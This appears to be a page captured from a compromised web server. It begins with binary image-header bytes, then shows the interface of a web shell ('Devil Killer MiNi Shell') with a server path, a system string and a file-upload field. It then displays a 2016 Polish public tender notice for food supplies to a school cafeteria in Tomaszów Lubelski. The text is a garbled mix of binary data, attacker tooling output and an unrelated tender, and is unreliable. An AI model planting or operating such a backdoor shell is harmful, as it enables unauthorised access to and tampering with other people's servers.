JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/157881-N-2016.html

<p class="kh_header"><b>Tomaszów Lubelski: Dostawa artykułów spożywczych do stołówki szkolnej przy Internacie Zespołu Szkół Nr 3 w Tomaszowie Lubelskim ul. Hallera 5</b><br>
<b>Numer ogłoszenia: 157881 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zs3tl.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.zs3tl.pl/przetarg</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki szkolnej przy Internacie Zespołu Szkół Nr 3 w Tomaszowie Lubelskim ul. Hallera 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych do  stołówki szkolnej przy Internacie Zespołu Szkół nr 3 w Tomaszowie Lubelskim ,ul. Hallera 5.
Przedmiot zamówienia został podzielony na 12 CZĘŚCI od nr 1 do 12 .
Wspólny słownik kodów CPV: 15000000-8	
CZĘŚĆ   I  	pieczywo					Kod CPV 15612500-6	
CZĘŚĆ  II 	Produkty Mleczarskie 	  			Kod CPV 15500000-3	
CZĘŚĆ  III 	Produkty zwierzęce, mięso i  produkty wędliniarskie Kod CPV 15100000-9  
                              Kod CPV 15131120-2
CZĘŚĆ  IV  	różne produkty spożywcze		              Kod CPV 15800000-6
CZĘŚĆ  V 	ryby przetworzone i konserwowane	              Kod CPV 15200000-0
CZĘŚĆ  VI 	drób						Kod CPV 15112000- 6
CZĘŚĆ  VII 	mrożonki 			 		Kod CPV 15331100-8
CZĘŚĆ  VIII 	owoce  świeże				               Kod CPV  03121000-5
CZĘŚĆ  IX 	warzywa 					Kod CPV 15300000-1 
CZĘŚĆ  X 	jaja  kurze					Kod CPV 03142500-3
CZĘŚĆ  XI 	produkty mączne  gotowe		Kod CPV 15851000-8
CZĘŚĆ  XII 	ziemniaki 					Kod CPV 03212100-1
Szczegółowy wykaz każdej części zawierają Arkusze kalkulacyjne oferty,  jako załączniki
nr 1.1 do 1.12 do Specyfikacji istotnych warunków zamówienia, stanowiący integralną ich część..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.50.00.00-3, 15.80.00.00-6, 03.21.21.00-1, 15.11.21.00-7, 03.14.25.00-3, 15.61.25.00-6, 15.33.11.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełnienia tego warunku nastąpi przez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu. 
Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia zostanie dokonana na zasadzie formuły spełnia nie spełnia w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, których wykaz znajduje się w pkt. 6 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełnienia tego warunku nastąpi przez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia zostanie dokonana na zasadzie formuły spełnia nie spełnia w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, których wykaz znajduje się w pkt. 6 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełnienia tego warunku nastąpi przez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia zostanie dokonana na zasadzie formuły spełnia nie spełnia w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, których wykaz znajduje się w pkt. 6 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełnienia tego warunku nastąpi przez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia zostanie dokonana na zasadzie formuły spełnia nie spełnia w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, których wykaz znajduje się w pkt. 6 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełnienia tego warunku nastąpi przez złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia zostanie dokonana na zasadzie formuły spełnia nie spełnia w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, których wykaz znajduje się w pkt. 6 niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Pełnomocnictwo, jeżeli oferta i załączniki nie będą podpisane przez osobę/y/wskazane w rejestrze sądowym lub innym dokumencie właściwym dla formy organizacyjnej wykonawcy. 
Z pełnomocnictwa musi jednoznacznie wynikać do jakich czynności prawnych dana osoba/y/ zostały umocowana/e/.Pełnomocnictwo powinno być złożone w oryginale lub kopii poświadczonej przez notariusza za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>15.2. Istotne postanowienia i warunki umowy zawiera projekt umowy. Zał. nr 6
2. Zamawiający dopuszcza możliwość zmiany postanowień niniejszej umowy w niżej wymienionych przypadkach :  
2.1.Nie przewiduje się wzrostu cen netto ,
             2.2. zmiany przepisów prawnych, w tym zmiany stawki podatku VAT.
2.3. zmiany nazwy towaru w przypadku, kiedy nowy towar spełnia wszystkie parametry towaru, który przestał być wytwarzany. 
       a/ wystąpienia okoliczności, których nie można było przewidzieć w chwili zawierania umowy,
       b/ wprowadzenia zmian korzystnych dla Zamawiającego,
d/ wystąpienia sytuacji niezależnych od stron umowy i działania siły wyższej. (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy; 
3.  W  sprawach nieuregulowanych niniejszą umową zastosowanie mają przepisy Kodeksu Cywilnego.
4.    Powiadomienie każdej ze Stron umowy jest ważne wyłącznie, gdy dokonane zostało pisemnie
       i skutecznie doręczone adresatowi.
5.    Strony zobowiązane są do wzajemnego pisemnego powiadamiania o zmianie siedziby, adresu, 
       zmiany formy prawnej w terminie do 14 dni od dnia wystąpienia zdarzenia.
6.   Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zs3tl.pl/przetarg<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 3 w Tomaszowie Lubelskim ul. Hallera 5
22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2016 godzina 12:00, miejsce: Zespół Szkół Nr 3 w Tomaszowie Lubelskim ul. Hallera 5
22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb  zwykły  krojony    waga nie mniej jak 500 g 	szt.	6000
2	Chleb razowy mieszany waga nie mniej jak 500 g	szt.	300
3	Bułka zwykła waga nie mniej jak  50 g	Szt.	11 000
4	Bułka tarta 	kg	    150
5	Drożdżówka 100 g	szt.	1100
6	Pierożki ( z kaszą , kapustą ) waga nie mniej niż  60 g 
	szt.	2000
7	Pączek  waga nie mniej jak   60 g	szt.	300
8	Makowiec  500 g	szt.	20
9	Cebularz  waga nie mniej niż 100 g	Szt.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty Mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko spożywcze  zaw.
2%  tł. w opak. 1 litr.
	litr	3500
2	Śmietana zaw. 18 % tł.   
	litr	 400 

3	Śmietana Kubek  op.450 ml zaw.18%  tł.
	szt.	 100
3	Masło ex .zawartość
tł. 82,5%   op. 0.200 g
	kg 	700 
4	Twaróg półtłusty 
	Kg.	 350 


5	Ser topiony  100 g
	Szt.	1900 


6	Ser żółty półtłusty
	kg	300


7	Jogurt  kubek  op.
 nie mniej  jak  125 ml. 
	Szt.	1400 
8	Serek wiejski  op. nie mniej jak 150 g	szt 	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.53.00.00-2, 15.54.21.00-0, 15.54.40.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty mięsne i wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	1	Mięso mielone wieprzowo-wołowe
	kg	350
2.	2	Mięso  wieprzowe gulaszowe  II  kl.
	kg	450 
3.	4	Karkówka 
    wieprzowa b/k 
	kg	150
4.		Karkówka z kością 	kg	200


5.	5	Schab  wieprzowy z kością 
	kg	450
6.	6	Schab wieprzowy b/k	kg	 50
7.	7	Wątroba wieprzowa
	kg	100 
8.	8	Żeberka  wieprzowe
(Paski) 
	kg	150 
9.	10	Boczek wędzony parzony	kg.	60
10.	12	Kiełbasa krakowska
 	kg	200
11.	13	Mielonka  wieprzowa Smaczek w galaretce 	kg	100
12.	14	Kiełbasa zwyczajna	kg	70 
13.	16	Kiełbasa wiejska 	kg.	200
14.	17	Kiełbasa szynkowa z 
kminkiem	kg	300
15.	18	Pieczeń rzymska 	kg 	150
16.	1	Polędwica sopocka 	kg 	320
17.		Ogonówka 	kg	220
18.	21	Paróweczki szynkowe wieprzowe 	kg	200
19.	22	Szynka parzona  domowa 	kg	400
20.	24	Flaki krojone odgotowane  	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.20-2, 15.13.12.10-0, 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Cukier biały kryształ- paczkowany  op.1kg	600	Kg

2.		Chrzan  tarty w słoiku op.  Nie mniej jak  160 g	50	Szt
3.		Kakao ciemne holenderskie  sypkie  op. Nie mniej jak  100 g	60	Szt
4.		Dżem wiśniowy op.  nie mniej jak 280g	400	Szt
5.		Dżem  truskawkowy , op. nie mniej jak  280 g	400	Szt
6.		Dżem  śliwkowy - nie mniej jak 280g	100	Szt

7.		Fasolka konserwowa czerwona 
op. nie mniejsze jak 400g	25	szt
8.		Fasolka konserwowa biała op. 400 g	30	Szt

9.		Groszek konserwowy  op. nie mniej jak  400 g  	120	Szt
10.		Gałka muszkatołowa mielona 20 g	10	Szt
11.		Herbata granulowana 100 g 	90	Szt
12.		Kawa inka  op. nie mniejsze 
jak 150 g	60	Szt
13.		Keczup PIKANTNY  
op. nie mniej jak  500 g
	220	Szt

14.		Koncentrat pomidorowy 30 % 
op. Nie mniej jak  200g 	230	Szt
15.		Kukurydza konserwowa słodka  -
op. nie mniejsze jak 400 g 
	120	Szt
16.		Kwasek cytrynowy  op. Nie mniej 
jak 20g	100	Szt
17.		Majonez  dekoracyjny nie mniej 
 jak 700 g  Firmy Winiary
lub  równoważny	100	Szt
18.		Musztarda  delikatesowa  op. nie mniej 180g	100	Szt
19.		Majeranek  torebka  op. 20g	110	Szt
20.		Ocet  spirytusowy 10 %  op. 05 l. 	10	Szt
21.		Przyprawa do zup w płynie  op. - 1 l  Firmy Winiar lub  równoważny 	120	Szt
22.		Pieprz naturalny czarny mielony 
Op. nie mniej jak 20g 	220
	Szt
23.		Pieprz ziołowy torebka  op. 20 g	50	Szt
24.		Papryka w proszku słodka mielona 
Op. nie mniej jak 20 g	160	Szt
25.		Pietruszka susz-  natka op. nie mniej jak 20g 	130	Szt.
26.		Koper susz nać  op. nie mniej jak 
20 g
	100	Szt.
27.		Przyprawa do potraw typu Vegeta lub  równoważny  op.200 g	140	Szt.
28.		Ryż biały  op. 1 kg	100	Kg
29.		Rosołki drobiowe 120 g   Firmy Winiar  lub równoważny	140	Szt.
30.		Sól sodowo-potasowa  op. 350 g 	130	Szt.
31.		Ziele angielskie torebka 15g	10	Szt.
32.		Liść laurowy  torebka 15 g	10	Szt.
33.		Mąka ziemniaczana  op. 1000 g	20	Kg
34.		Mąka pszenna  luksusowa  typ 550  	200	Kg
35.		Olej jadalny rzepakowy  op. 1 litr	400	Szt.
36.		Olej jadalny rzepakowy op. Nie mniej jak 3 l. 	  20	Szt.
37.		Margaryna  śniadaniowa z zaw. olejów roślinnych op. 500 g	400	Szt.
38.		Kasza jęczmienna  wiejska op.1000g	60	Kg
39.		Kasza gryczana  op. 1000 g	60	Kg
40.		Płatki kukurydziane  zwykłe op. 
nie mniej jak 425 g.	70	Szt.
41.		Ogórek konserwowy  op. poj. 0.9 l	220	Szt

42.		Papryka konserwowa op.  poj. 0,9 l 	200	Szt

43.		Serek top. Krążek  op. 140 g
	320	op
44.		Serek top. plastry op. 150g
	500	op
45.		Konserwa turystyczna  nie mniej
jak  op. 135g	700	Szt
46.		Pasztet drobiowy nie mniej jak op.135g 	1200	Szt
47.		Delikat do mięs Knor 
Lub  równoważny  op. 700 g	15	Szt

48.		Delikat do ryb op. 700g	2	Szt

49.		Delikat do drobiu op. 700 g	6	Szt.

50.		Sos ogrodowy sałatkowy op.900 g	10	Szt.

51.		Cukier puder  op.500g 
	20	Szt.
52.		Cukier waniliowy 
	20	Szt.
53.		Czekolada  Wedell  op. 100 g 
 lub  równoważny  	300	Szt.

54.		Makaron świderki  
op. Nie mniej jak 1000 g 
	100	Szt.
55.		Makaron  krajanka  do rosołu   
4- jajeczny op. 250 g. 	100	Szt.


56.		Makaron  zacierka op. 250 g. 
	50	Szt.


57.		Makaron  spaghetti  Lubella  
 lub  równoważny op. 400 g
    	450	Szt.
58.		Makaron łazanki  Lubella   
 lub  równoważny op.  400g 
	
100	
Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.12.00-4, 15.86.00.00-4, 15.87.00.00-7, 15.40.00.00-2, 15.87.10.00-4.</p></li>
